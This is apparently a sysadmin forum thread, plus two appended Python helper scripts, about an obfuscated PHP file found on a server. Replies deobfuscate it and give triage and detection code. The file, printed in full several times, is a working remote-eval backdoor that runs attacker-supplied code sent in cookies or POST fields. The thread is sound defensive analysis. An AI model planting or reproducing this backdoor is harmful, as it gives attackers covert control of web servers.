
Wirus

become

New Member
Hello. I see PHP files that look like a virus.

The content of this file is:

Code:
<?php

$sjzwewe = '_cv3r64o7es0892#tuHdxbp-k5nmy\'gal*i';$qgrywj = Array();$qgrywj[] = $sjzwewe[18].$sjzwewe[33];$qgrywj[] = $sjzwewe[1].$sjzwewe[31].$sjzwewe[9].$sjzwewe[19].$sjzwewe[8].$sjzwewe[3].$sjzwewe[1].$sjzwewe[1].$sjzwewe[23].$sjzwewe[25].$sjzwewe[14].$sjzwewe[1].$sjzwewe[25].$sjzwewe[23].$sjzwewe[6].$sjzwewe[1].$sjzwewe[13].$sjzwewe[31].$sjzwewe[23].$sjzwewe[21].$sjzwewe[5].$sjzwewe[13].$sjzwewe[6].$sjzwewe[23].$sjzwewe[14].$sjzwewe[19].$sjzwewe[6].$sjzwewe[21].$sjzwewe[19].$sjzwewe[3].$sjzwewe[11].$sjzwewe[1].$sjzwewe[12].$sjzwewe[21].$sjzwewe[21].$sjzwewe[19];$qgrywj[] = $sjzwewe[15];$qgrywj[] = $sjzwewe[1].$sjzwewe[7].$sjzwewe[17].$sjzwewe[26].$sjzwewe[16];$qgrywj[] = $sjzwewe[10].$sjzwewe[16].$sjzwewe[4].$sjzwewe[0].$sjzwewe[4].$sjzwewe[9].$sjzwewe[22].$sjzwewe[9].$sjzwewe[31].$sjzwewe[16];$qgrywj[] = $sjzwewe[9].$sjzwewe[20].$sjzwewe[22].$sjzwewe[32].$sjzwewe[7].$sjzwewe[19].$sjzwewe[9];$qgrywj[] = $sjzwewe[10].$sjzwewe[17].$sjzwewe[21].$sjzwewe[10].$sjzwewe[16].$sjzwewe[4];$qgrywj[] = $sjzwewe[31].$sjzwewe[4].$sjzwewe[4].$sjzwewe[31].$sjzwewe[28].$sjzwewe[0].$sjzwewe[27].$sjzwewe[9].$sjzwewe[4].$sjzwewe[30].$sjzwewe[9];$qgrywj[] = $sjzwewe[10].$sjzwewe[16].$sjzwewe[4].$sjzwewe[32].$sjzwewe[9].$sjzwewe[26];$qgrywj[] = $sjzwewe[22].$sjzwewe[31].$sjzwewe[1].$sjzwewe[24];foreach ($qgrywj[7]($_COOKIE, $_POST) as $txsfwcl => $mhbtlou){function xvidonr($qgrywj, $txsfwcl, $pcvfru){return $qgrywj[6]($qgrywj[4]($txsfwcl . $qgrywj[1], ($pcvfru / $qgrywj[8]($txsfwcl)) + 1), 0, $pcvfru);}function xtddq($qgrywj, $xrsscmu){return @$qgrywj[9]($qgrywj[0], $xrsscmu);}function lqzmlux($qgrywj, $xrsscmu){$mzvrgh = $qgrywj[3]($xrsscmu) % 3;if (!$mzvrgh) {eval($xrsscmu[1]($xrsscmu[2]));exit();}}$mhbtlou = xtddq($qgrywj, $mhbtlou);lqzmlux($qgrywj, $qgrywj[5]($qgrywj[2], $mhbtlou ^ xvidonr($qgrywj, $txsfwcl, $qgrywj[8]($mhbtlou))));}

I use clamav and rkhunter but none of them recognize this infected file. Is there any other software which can remove this file or mark it as infected?
 


Rob

Administrator
Staff member
Ok - and who owns the files? root or the individual users? I'd def say you have something going on there, and would recommend installing cxs and running a scan. It'd go through and find anything else that was installed and quarantine them.

If you don't go the cxs route, look at the file owners and the timestamp of them all, then find other files that were created at the same time.
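The "look at the owners and timestamps, then find what else landed at the same time" step above, written out as a script. This is an added example, not code from the thread or from cxs: it walks a directory tree and lists every file whose modification time (or, with `key="ctime"`, inode change time) falls within a window around a file you have already judged suspect, together with each file's owner. The function names, the fixture files and the timestamps are this example's own.

```python
#!/usr/bin/env python3
# Added example (not from the thread): timestamp-and-owner triage around a
# known-bad file. Assumes a POSIX filesystem; names and paths are invented.
import os
import pwd
import tempfile
from datetime import datetime, timezone


def owner_name(uid):
    """Map a uid to a login name, falling back to the bare number."""
    try:
        return pwd.getpwuid(uid).pw_name
    except KeyError:
        return str(uid)


def files_in_window(reference, root, minutes=10, key="mtime"):
    """Return [(path, owner, when)] for files under root whose timestamp
    lies within +/- minutes of the reference file's, oldest first.
    key="ctime" keys on inode change time, which `touch -d` cannot rewrite."""
    attr = "st_ctime" if key == "ctime" else "st_mtime"
    centre = getattr(os.lstat(reference), attr)
    lo, hi = centre - minutes * 60, centre + minutes * 60
    hits = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # do not follow symlinks
            except OSError:
                continue
            when = getattr(st, attr)
            if lo <= when <= hi:
                hits.append((path, owner_name(st.st_uid),
                             datetime.fromtimestamp(when, timezone.utc)))
    return sorted(hits, key=lambda h: h[2])


def demo():
    """Constructed fixture: three files with mtimes 0 s, 3 min and 8 h apart.
    Returns the base names found within ten minutes of bad.php."""
    root = tempfile.mkdtemp()
    base = 1_700_000_000
    for name, offset in (("bad.php", 0), ("also.php", 180), ("old.txt", 8 * 3600)):
        path = os.path.join(root, name)
        open(path, "w").close()
        os.utime(path, (base + offset, base + offset))
    hits = files_in_window(os.path.join(root, "bad.php"), root, minutes=10)
    return [os.path.basename(h[0]) for h in hits]


if __name__ == "__main__":
    print(demo())
```

On a real host you would call `files_in_window("/path/to/suspect.php", "/var/www", minutes=10, key="ctime")`: mtime is trivially back-dated with `touch`, whereas ctime is set by the kernel on every inode change, so it is the better key when the drop may have tried to blend in.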
 

JasKinasis

Well-Known Member
Looking at the code you've posted - the scripts are blatantly obfuscated.

It's possible that they could have been placed there by an intruder, or it could be some php module that your system uses which is generating these scripts on a per-user basis.

I have tried to de-obfuscate what I can.
First I had to identify where each line ended. So I split based on things like curly braces {} and semicolons ; and searched for any keywords - like "function".

After that things became a little clearer.

Here's the script with some spacing added - and a few of my own comments:
Code:
<?php

# character array
$sjzwewe = '_cv3r64o7es0892#tuHdxbp-k5nmy\'gal*i';

# array of strings
$qgrywj = Array();

# populate array of strings using characters from character array
$qgrywj[] = $sjzwewe[18].$sjzwewe[33];
$qgrywj[] = $sjzwewe[1].$sjzwewe[31].$sjzwewe[9].$sjzwewe[19].$sjzwewe[8].$sjzwewe[3].$sjzwewe[1].$sjzwewe[1].$sjzwewe[23].$sjzwewe[25].$sjzwewe[14].$sjzwewe[1].$sjzwewe[25].$sjzwewe[23].$sjzwewe[6].$sjzwewe[1].$sjzwewe[13].$sjzwewe[31].$sjzwewe[23].$sjzwewe[21].$sjzwewe[5].$sjzwewe[13].$sjzwewe[6].$sjzwewe[23].$sjzwewe[14].$sjzwewe[19].$sjzwewe[6].$sjzwewe[21].$sjzwewe[19].$sjzwewe[3].$sjzwewe[11].$sjzwewe[1].$sjzwewe[12].$sjzwewe[21].$sjzwewe[21].$sjzwewe[19];
$qgrywj[] = $sjzwewe[15];
$qgrywj[] = $sjzwewe[1].$sjzwewe[7].$sjzwewe[17].$sjzwewe[26].$sjzwewe[16];
$qgrywj[] = $sjzwewe[10].$sjzwewe[16].$sjzwewe[4].$sjzwewe[0].$sjzwewe[4].$sjzwewe[9].$sjzwewe[22].$sjzwewe[9].$sjzwewe[31].$sjzwewe[16];
$qgrywj[] = $sjzwewe[9].$sjzwewe[20].$sjzwewe[22].$sjzwewe[32].$sjzwewe[7].$sjzwewe[19].$sjzwewe[9];
$qgrywj[] = $sjzwewe[10].$sjzwewe[17].$sjzwewe[21].$sjzwewe[10].$sjzwewe[16].$sjzwewe[4];
$qgrywj[] = $sjzwewe[31].$sjzwewe[4].$sjzwewe[4].$sjzwewe[31].$sjzwewe[28].$sjzwewe[0].$sjzwewe[27].$sjzwewe[9].$sjzwewe[4].$sjzwewe[30].$sjzwewe[9];
$qgrywj[] = $sjzwewe[10].$sjzwewe[16].$sjzwewe[4].$sjzwewe[32].$sjzwewe[9].$sjzwewe[26];
$qgrywj[] = $sjzwewe[22].$sjzwewe[31].$sjzwewe[1].$sjzwewe[24];

# Now the script starts doing things using the strings generated above
foreach ($qgrywj[7]($_COOKIE, $_POST) as $txsfwcl => $mhbtlou)
{
    function xvidonr($qgrywj, $txsfwcl, $pcvfru)
    {
        return $qgrywj[6]($qgrywj[4]($txsfwcl . $qgrywj[1], ($pcvfru / $qgrywj[8]($txsfwcl)) + 1), 0, $pcvfru);
    }

    function xtddq($qgrywj, $xrsscmu)
    {
        return @$qgrywj[9]($qgrywj[0], $xrsscmu);
    }
 
    function lqzmlux($qgrywj, $xrsscmu)
    {
        $mzvrgh = $qgrywj[3]($xrsscmu) % 3;
        if (!$mzvrgh)
        {
            eval($xrsscmu[1]($xrsscmu[2]));
            exit();
        }
    }
 
    $mhbtlou = xtddq($qgrywj, $mhbtlou);
    lqzmlux($qgrywj, $qgrywj[5]($qgrywj[2], $mhbtlou ^ xvidonr($qgrywj, $txsfwcl, $qgrywj[8]($mhbtlou))));
}

The initial part of the script which you posted sets up what looks like a random string, but then underneath it is populating an array of strings with concatenated characters taken from the character array.

I quickly wrote a python script to analyse the strings that are generated in the block of code under the character array...
deObfuscate.py:
Code:
#!/usr/bin/env python3

def TranslateLists(indicesLists):
    # character array from suspect php code
    characters = ['_','c','v','3','r','6','4','o','7','e','s','0','8','9','2','#','t','u','H','d','x','b','p','-','k', '5', 'n', 'm', 'y', '\'', 'g', 'a', 'l', '*', 'i']
    for indicesList in indicesLists:
        stringout=""
        for index in indicesList:
            stringout += characters[index]
        print(stringout)

# Pass the function the indices used in the block
# of code which set up the string array $qgrywj[]
TranslateLists([[18,33],
                [1,31,9,19,8,3,1,1,23,25,14,1,25,23,6,1,13,31,23,21,5,13,6,23,14,19,6,21,19,3,11,1,12,21,21,19],
                [15],
                [1,7,17,26,16],
                [10,16,4,0,4,9,22,9,31,16],
                [9,20,22,32,7,19,9],
                [10,17,21,10,16,4],
                [31,4,4,31,28,0,27,9,4,30,9],
                [10,16,4,32,9,26],
                [22,31,1,24]])

Which yielded the following results:
Code:
H*
caed73cc-52c5-4c9a-b694-2d4bd30c8bbd
#
count
str_repeat
explode
substr
array_merge
strlen
pack
And using that we can deduce that anything that refers to any part of $qgrywj[] refers to one of the above strings.
If it is indexed, e.g. $qgrywj[5], then it refers to a single string in the list, so index 5 would be the explode function. If no index follows $qgrywj, it is referring to the entire list of strings.
So in some of the function calls, it means that the list of strings is passed into the function and then calls inside the function will use individual commands/operands stored in the list of strings.

So de-obfuscating what we can - the code snippet you posted looks like this:
Code:
<?php

$character_list = '_cv3r64o7es0892#tuHdxbp-k5nmy\'gal*i';

$string_list = Array();
$string_list[] = "H*";                                   #string_list index 0
$string_list[] = "caed73cc-52c5-4c9a-b694-2d4bd30c8bbd"; #index 1
$string_list[] = "#";                                    #index 2
$string_list[] = "count";                                #index 3
$string_list[] = "str_repeat";                           #index 4
$string_list[] = "explode";                              #index 5
$string_list[] = "substr";                               #index 6
$string_list[] = "array_merge";                          #index 7
$string_list[] = "strlen";                               #index 8
$string_list[] = "pack";                                 #index 9

# every cookie and every POST field is visited, name => value
foreach ( array_merge($_COOKIE, $_POST) as $txsfwcl => $mhbtlou)
{
    # repeats (parameter name . fixed string) until it is at least $pcvfru long
    function xvidonr($string_list, $txsfwcl, $pcvfru)
    {
        return substr(str_repeat($txsfwcl . "caed73cc-52c5-4c9a-b694-2d4bd30c8bbd",
                                 ($pcvfru / strlen($txsfwcl)) + 1), 0, $pcvfru);
    }

    # hex string -> raw bytes
    function xtddq($string_list, $xrsscmu)
    {
        return @pack("H*", $xrsscmu);
    }

    # if the split result has a multiple of 3 parts, eval part[1](part[2])
    function lqzmlux($string_list, $xrsscmu)
    {
        $mzvrgh = count($xrsscmu) % 3;
        if (!$mzvrgh)
        {
            eval($xrsscmu[1]($xrsscmu[2]));
            exit();
        }
    }

    $mhbtlou = xtddq($string_list, $mhbtlou);
    lqzmlux($string_list, explode("#", $mhbtlou ^ xvidonr($string_list, $txsfwcl, strlen($mhbtlou))));
}

There are a few things that are still obfuscated in there, so I'm guessing you only posted the first few lines of one of the files.
But so far I can't tell whether it is doing anything nasty or not because we only have part of the picture.

Also, some of the above might not necessarily be valid PHP - I haven't done any PHP for a long time.
I've just substituted in what I can see, so you can see what it's doing. So I can't vouch for the correctness of the code, but it does at least help to build a picture of what the code is doing. So the code above should be treated as pseudo-code!

This could be some proprietary php module that you have installed which has generated some obfuscated code. Or it could be malware. For now - the jury is still out!
 
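The index lists in deObfuscate.py were typed in by hand. What follows is an added example, not code from the thread, that does the same job automatically and takes it one step further: it parses the character array and every `$table[] = $chars[i].$chars[j]...;` assignment straight out of the PHP source, rewrites each `$table[N]` reference with the recovered string (a `$table[N](` call becomes a direct call), and then checks the readable result for a handful of traits a defender cares about: `eval`, merged `$_COOKIE`/`$_POST` input, `pack("H*")` hex decoding, XOR against a generated key, and the string-table construction itself. The sample it runs on is the script from the first post, split at statement boundaries; the function names, indicator names and regexes are this example's own.

```python
#!/usr/bin/env python3
# Added example (not code from the thread): generic string-table recovery
# for character-array-obfuscated PHP, followed by a small indicator scan.
import re

# The script posted at the top of the thread, split at statement
# boundaries for readability (same statements, same order).
SAMPLE_PHP = r"""<?php
$sjzwewe = '_cv3r64o7es0892#tuHdxbp-k5nmy\'gal*i';
$qgrywj = Array();
$qgrywj[] = $sjzwewe[18].$sjzwewe[33];
$qgrywj[] = $sjzwewe[1].$sjzwewe[31].$sjzwewe[9].$sjzwewe[19].$sjzwewe[8].$sjzwewe[3].$sjzwewe[1].$sjzwewe[1].$sjzwewe[23].$sjzwewe[25].$sjzwewe[14].$sjzwewe[1].$sjzwewe[25].$sjzwewe[23].$sjzwewe[6].$sjzwewe[1].$sjzwewe[13].$sjzwewe[31].$sjzwewe[23].$sjzwewe[21].$sjzwewe[5].$sjzwewe[13].$sjzwewe[6].$sjzwewe[23].$sjzwewe[14].$sjzwewe[19].$sjzwewe[6].$sjzwewe[21].$sjzwewe[19].$sjzwewe[3].$sjzwewe[11].$sjzwewe[1].$sjzwewe[12].$sjzwewe[21].$sjzwewe[21].$sjzwewe[19];
$qgrywj[] = $sjzwewe[15];
$qgrywj[] = $sjzwewe[1].$sjzwewe[7].$sjzwewe[17].$sjzwewe[26].$sjzwewe[16];
$qgrywj[] = $sjzwewe[10].$sjzwewe[16].$sjzwewe[4].$sjzwewe[0].$sjzwewe[4].$sjzwewe[9].$sjzwewe[22].$sjzwewe[9].$sjzwewe[31].$sjzwewe[16];
$qgrywj[] = $sjzwewe[9].$sjzwewe[20].$sjzwewe[22].$sjzwewe[32].$sjzwewe[7].$sjzwewe[19].$sjzwewe[9];
$qgrywj[] = $sjzwewe[10].$sjzwewe[17].$sjzwewe[21].$sjzwewe[10].$sjzwewe[16].$sjzwewe[4];
$qgrywj[] = $sjzwewe[31].$sjzwewe[4].$sjzwewe[4].$sjzwewe[31].$sjzwewe[28].$sjzwewe[0].$sjzwewe[27].$sjzwewe[9].$sjzwewe[4].$sjzwewe[30].$sjzwewe[9];
$qgrywj[] = $sjzwewe[10].$sjzwewe[16].$sjzwewe[4].$sjzwewe[32].$sjzwewe[9].$sjzwewe[26];
$qgrywj[] = $sjzwewe[22].$sjzwewe[31].$sjzwewe[1].$sjzwewe[24];
foreach ($qgrywj[7]($_COOKIE, $_POST) as $txsfwcl => $mhbtlou){function xvidonr($qgrywj, $txsfwcl, $pcvfru){return $qgrywj[6]($qgrywj[4]($txsfwcl . $qgrywj[1], ($pcvfru / $qgrywj[8]($txsfwcl)) + 1), 0, $pcvfru);}function xtddq($qgrywj, $xrsscmu){return @$qgrywj[9]($qgrywj[0], $xrsscmu);}function lqzmlux($qgrywj, $xrsscmu){$mzvrgh = $qgrywj[3]($xrsscmu) % 3;if (!$mzvrgh) {eval($xrsscmu[1]($xrsscmu[2]));exit();}}$mhbtlou = xtddq($qgrywj, $mhbtlou);lqzmlux($qgrywj, $qgrywj[5]($qgrywj[2], $mhbtlou ^ xvidonr($qgrywj, $txsfwcl, $qgrywj[8]($mhbtlou))));}
"""


def unescape_single_quoted(s):
    # In a PHP single-quoted string only backslash and quote are escapable.
    return re.sub(r"\\([\\'])", r"\1", s)


def find_char_array(php):
    """Return (variable name, characters) of the first single-quoted string
    assignment, which is the character pool in this obfuscation style."""
    m = re.search(r"\$(\w+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;", php)
    if not m:
        raise ValueError("no single-quoted character array found")
    return m.group(1), unescape_single_quoted(m.group(2))


def recover_string_table(php):
    """Return (table variable name, list of strings) rebuilt from every
    `$table[] = $chars[i].$chars[j]...;` assignment in the source."""
    chars_var, chars = find_char_array(php)
    ref = r"\$" + re.escape(chars_var) + r"\[\d+\]"
    pattern = r"\$(\w+)\[\]\s*=\s*((?:" + ref + r"\s*\.?\s*)+);"
    table_var, table = None, []
    for m in re.finditer(pattern, php):
        table_var = table_var or m.group(1)
        indices = [int(i) for i in re.findall(r"\[(\d+)\]", m.group(2))]
        table.append("".join(chars[i] for i in indices))
    if table_var is None:
        raise ValueError("no string-table assignments found")
    return table_var, table


def resolve_references(php):
    """Rewrite `$table[N](` as a direct call and `$table[N]` as a literal."""
    table_var, table = recover_string_table(php)

    def sub(m):
        idx = int(m.group(1))
        if idx >= len(table):
            return m.group(0)
        if m.group(2):  # `$table[N](` is PHP's variable-function call form
            return table[idx] + "("
        lit = table[idx].replace("\\", "\\\\").replace("'", "\\'")
        return "'" + lit + "'"

    return re.sub(r"\$" + re.escape(table_var) + r"\[(\d+)\](\s*\()?", sub, php)


# Indicators are checked on the resolved source, where the names are visible.
INDICATORS = {
    "eval_call": r"\beval\s*\(",
    "request_data_merged": r"array_merge\s*\(\s*\$_(?:COOKIE|POST|GET|REQUEST)\b",
    "hex_unpack": r"pack\s*\(\s*['\"]H\*['\"]",
    "xor_with_generated_key": r"\^\s*\w+\s*\(",
    "char_array_string_table": r"\$\w+\[\]\s*=\s*(?:\$\w+\[\d+\]\s*\.\s*){2,}",
}


def scan(php):
    """Return the sorted names of the indicators present in the file."""
    try:
        readable = resolve_references(php)
    except ValueError:
        readable = php
    return sorted(n for n, rx in INDICATORS.items() if re.search(rx, readable))


if __name__ == "__main__":
    _, table = recover_string_table(SAMPLE_PHP)
    for i, s in enumerate(table):
        print(f"[{i}] {s}")
    print(resolve_references(SAMPLE_PHP))
    print("indicators:", scan(SAMPLE_PHP))
```

With the references resolved, the loop reads as: for every cookie or POST field, hex-decode the value, XOR it against a keystream built from the parameter name plus the fixed UUID string, split on `#`, and if the number of pieces is a multiple of three, `eval` the second piece applied to the third. That is a remote-eval backdoor keyed on request data, and because the character pool and variable names are regenerated per copy, signature scanning can miss a fresh variant; scanning for the structural indicators above (or with a tool such as cxs, as suggested earlier in the thread) across the whole web root is the more reliable way to find the rest of the drop.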
